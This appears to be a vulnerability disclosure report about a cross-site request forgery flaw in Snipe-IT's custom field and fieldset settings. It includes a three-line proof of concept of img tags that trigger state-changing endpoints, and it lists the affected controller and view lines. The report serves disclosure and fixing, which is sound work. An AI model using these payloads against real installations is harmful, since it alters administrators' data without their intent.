Cross-Site Request Forgery (CSRF) in snipe/snipe-it
Reported on
Nov 4th 2021
Description
CSRF in custom field settings
Proof of Concept
<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">
Impact
This vulnerability allows an attacker to trick an authenticated admin user into modifying custom fields and fieldsets (disassociating a field from a fieldset, or toggling a field between required and optional) without the admin's intent.
Occurrences
view.blade.php L72-L77 (disassociate frontend)
CustomFieldsetsController.php L207-L219 (required backend)
view.blade.php L61-L63 (optional frontend)
fields.php L15 (optional api)
view.blade.php L66-L68 (required frontend)
CustomFieldsController.php L130-L142 (disassociate backend)
fields.php L20 (disassociate api)
CustomFieldsetsController.php L227-L239 (optional backend)
fields.php L10 (required api)